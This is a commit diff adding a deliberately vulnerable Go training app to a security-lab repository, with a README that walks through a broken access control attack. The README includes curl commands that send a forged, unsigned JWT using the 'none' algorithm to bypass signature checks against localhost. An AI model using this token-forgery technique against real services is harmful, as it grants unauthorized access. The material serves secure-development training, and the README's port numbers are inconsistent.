globocom
diff --git a/‎owasp-top10-2021-apps/a1/camplake-api/.gitignore b/‎owasp-top10-2021-apps/a1/camplake-api/.gitignore
diff --git a/‎owasp-top10-2021-apps/a1/camplake-api/Makefile
Lines changed: 44 additions & 0 deletions b/‎owasp-top10-2021-apps/a1/camplake-api/Makefile
Lines changed: 44 additions & 0 deletions
diff --git a/‎owasp-top10-2021-apps/a1/camplake-api/README.md
Lines changed: 124 additions & 0 deletions b/‎owasp-top10-2021-apps/a1/camplake-api/README.md
Lines changed: 124 additions & 0 deletions
diff --git a/‎owasp-top10-2021-apps/a1/camplake-api/app/context/context.go
Lines changed: 83 additions & 0 deletions b/‎owasp-top10-2021-apps/a1/camplake-api/app/context/context.go
Lines changed: 83 additions & 0 deletions
diff --git a/‎owasp-top10-2021-apps/a1/camplake-api/app/crypto/hash.go
Lines changed: 15 additions & 0 deletions b/‎owasp-top10-2021-apps/a1/camplake-api/app/crypto/hash.go
Lines changed: 15 additions & 0 deletions
@@ -0,0 +1,44 @@
+.SILENT:
+.DEFAULT_GOAL := help
+
+COLOR_RESET = \033[0m
+COLOR_COMMAND = \033[36m
+COLOR_YELLOW = \033[33m
+COLOR_GREEN = \033[32m
+COLOR_RED = \033[31m
+
+PROJECT := A1 Camp Crystal Lake API
+PORT := 20001
+SLEEPUNTILAPPSTARTS := 10
+
+## Installs a development environment
+install: generate-passwords compose
+
+## Runs project using docker-compose
+compose:
+	docker-compose -f deployments/docker-compose.yml down -v --remove-orphans
+	docker-compose -f deployments/docker-compose.yml up -d --build --force-recreate
+
+## Generates passwords and set them as environment variables
+generate-passwords:
+	chmod +x deployments/scripts.sh
+	./deployments/scripts.sh
+
+## Prints initialization message after compose phase
+msg:
+	chmod +x deployments/check-init.sh
+	./deployments/check-init.sh
+
+## Prints help message
+help:
+	printf "\n${COLOR_YELLOW}${PROJECT}\n------\n${COLOR_RESET}"
+	awk '/^[a-zA-Z\-\_0-9\.%]+:/ { \
+		helpMessage = match(lastLine, /^## (.*)/); \
+		if (helpMessage) { \
+			helpCommand = substr($$1, 0, index($$1, ":")); \
+			helpMessage = substr(lastLine, RSTART + 3, RLENGTH); \
+			printf "${COLOR_COMMAND}$$ make %s${COLOR_RESET} %s\n", helpCommand, helpMessage; \
+		} \
+	} \
+	{ lastLine = $$0 }' $(MAKEFILE_LIST) | sort
+	printf "\n"
@@ -0,0 +1,124 @@
+# Camp Crystal Lake API
+
+<p align="center">
+    <img src="images/camplake.png" width="400" height="400"/>
+</p>
+
+Camp Crystal Lake API is a simple Golang web application that contains an example of a Broken Access Control vulnerability and its main goal is to describe how a malicious user could exploit it.
+
+## Index
+
+- [Definition](#what-is-broken-access-control)
+- [Setup](#setup)
+- [Attack narrative](#attack-narrative)
+- [Objectives](#secure-this-app)
+- [Solutions](#pr-solutions)
+- [Contributing](#contributing)
+
+## What is Broken Access Control?
+
+Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits. 
+
+Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access to other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.
+
+The main goal of this app is to discuss how **Broken Access Control** vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.
+
+## Setup
+
+To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+
+```sh
+cd secDevLabs/owasp-top10-2021-apps/a1/camp-lake-api
+```
+
+```sh
+make install
+```
+
+Then simply visit [localhost:20001][App] ! 😆
+
+## Get to know the app 💵
+
+To properly understand how this application works, you can follow this step:
+
+- Registering a user, log in and create a new post!
+
+## Attack narrative
+
+Now that you know the purpose of this app, what could go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or its users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜
+
+### 👀
+
+#### Incorrect JWT validation, such as not validating the signature algorithm used, allows malicious users to create fake tokens and abuse JWT non-validation.
+
+To better understand how the API works, we'll create a new user.
+
+For this example we create the user with the following login credentials - `campLakeAdmin:campLake2021`
+
+```sh
+curl -s -H "Content-Type: application/json" -d '{"username":"campLakeAdmin","password":"campLake2021"}' http://localhost:20001/register  
+```
+
+<p align="center">
+    <img src="images/attack_1.png"/>
+</p>
+
+With the created user, we will login to the application with their credentials to get the JWT token. As it is a test application, the JWT token is returned to the user as soon as he is logged in.
+
+```sh
+curl -s -H "Content-Type: application/json" -d '{"username":"campLakeAdmin","password":"campLake2021"}' http://localhost:10007/login
+```
+
+<p align="center">
+    <img src="images/attack_2.png"/>
+</p>
+
+<p align="center">
+    <img src="images/attack_4.png"/>
+</p>
+
+In possession of the JWT token, we can create a new post in the API, making a POST request directly to the authenticated route `newPost`.
+
+```sh
+curl -s -H 'Content-Type: application/json' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNhbXBMYWtlQWRtaW4iLCJleHAiOjE2MzMzODI5MzR9.aW4BTVuXaozSbF6EAJfRNsApRA_1hfk2OhaLAo250Uo' -d '{"title": "New member ", "post": "Today a new member ..."}' http://localhost:20001/newpost
+```
+
+<p align="center">
+    <img src="images/attack_3.png"/>
+</p>
+
+### 🔥
+
+However, the API does not verify the signature used by the JWT token, any malicious user can create a fake token, as shown by the image:
+
+<p align="center">
+    <img src="images/attack_6.png"/>
+</p>
+
+```sh
+curl -s -H 'Content-Type: application/json' -H 'Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6Imphc29uVm9vcmhlc3MiLCJleHAiOjE2MzMzODM1ODZ9.' -d '{"title": "New member ", "post": "Today a new member ..."}' http://localhost:20001/newpost
+```
+
+<p align="center">
+    <img src="images/attack_5.png"/>
+</p>
+
+## Secure this app
+
+How would you mitigate this vulnerability? After your changes, an attacker should not be able to:
+
+* Check and validate JWT Token signature.
+
+## PR solutions
+
+[Spoiler alert 🚨 ] To understand how this vulnerability can be mitigated, check out [these pull requests]()!
+
+## Contributing
+
+We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
+
+[Docker Install]:  https://docs.docker.com/install/
+[Docker Compose Install]: https://docs.docker.com/compose/install/
+[App]: http://localhost:10005
+[secDevLabs]: https://github.com/globocom/secDevLabs
+[2]:https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api
@@ -0,0 +1,83 @@
+package context
+
+import (
+	"fmt"
+	"os"
+	"strconv"
+	"sync"
+	"time"
+)
+
+// MongoConfig represents MongoDB configuration.
+type MongoConfig struct {
+	Address      string
+	DatabaseName string
+	Timeout      time.Duration
+	Username     string
+	Password     string
+}
+
+// APIConfig represents API configuration.
+type APIConfig struct {
+	MongoDBConfig *MongoConfig
+	APIPort       int
+}
+
+var apiConfig *APIConfig
+var onceConfig sync.Once
+
+// GetAPIConfig returns the instance of an APIConfig.
+func GetAPIConfig() *APIConfig {
+	onceConfig.Do(func() {
+		apiConfig = &APIConfig{
+			MongoDBConfig: getMongoConfig(),
+			APIPort:       getAPIPort(),
+		}
+	})
+	return apiConfig
+}
+
+// getMongoConfig returns all MongoConfig retrieved from environment variables.
+func getMongoConfig() *MongoConfig {
+	mongoHost := os.Getenv("MONGO_HOST")
+	mongoDatabaseName := os.Getenv("MONGO_DATABASE_NAME")
+	mongoUserName := os.Getenv("MONGO_DATABASE_USERNAME")
+	mongoPassword := os.Getenv("MONGO_DATABASE_PASSWORD")
+	mongoTimeout := getMongoTimeout()
+	mongoPort := getMongoPort()
+	mongoAddress := fmt.Sprintf("%s:%d", mongoHost, mongoPort)
+
+	return &MongoConfig{
+		Address:      mongoAddress,
+		DatabaseName: mongoDatabaseName,
+		Timeout:      mongoTimeout,
+		Username:     mongoUserName,
+		Password:     mongoPassword,
+	}
+}
+
+// getAPIPort returns the API port retrieved from an environment variable.
+func getAPIPort() int {
+	apiPort, err := strconv.Atoi(os.Getenv("API_PORT"))
+	if err != nil {
+		apiPort = 20007
+	}
+	return apiPort
+}
+
+func getMongoTimeout() time.Duration {
+	mongoTimeout, err := strconv.Atoi(os.Getenv("MONGO_TIMEOUT"))
+	if err != nil {
+		return time.Duration(60) * time.Second
+	}
+	return time.Duration(mongoTimeout) * time.Second
+}
+
+// getMongoPort returns the port used by MongoDB retrieved from an environment variable.
+func getMongoPort() int {
+	mongoPort, err := strconv.Atoi(os.Getenv("MONGO_PORT"))
+	if err != nil {
+		return 27017
+	}
+	return mongoPort
+}
@@ -0,0 +1,15 @@
+package crypto
+
+import "golang.org/x/crypto/bcrypt"
+
+// BcryptPassword returns a hashed password using bcrypt and an error.
+func BcryptPassword(password string) (string, error) {
+	bytes, err := bcrypt.GenerateFromPassword([]byte(password), 14)
+	return string(bytes), err
+}
+
+// CheckPasswordHash returns a bool if a password matches its bcrypt hash.
+func CheckPasswordHash(password, hash string) bool {
+	err := bcrypt.CompareHashAndPassword([]byte(hash), []byte(password))
+	return err == nil
+}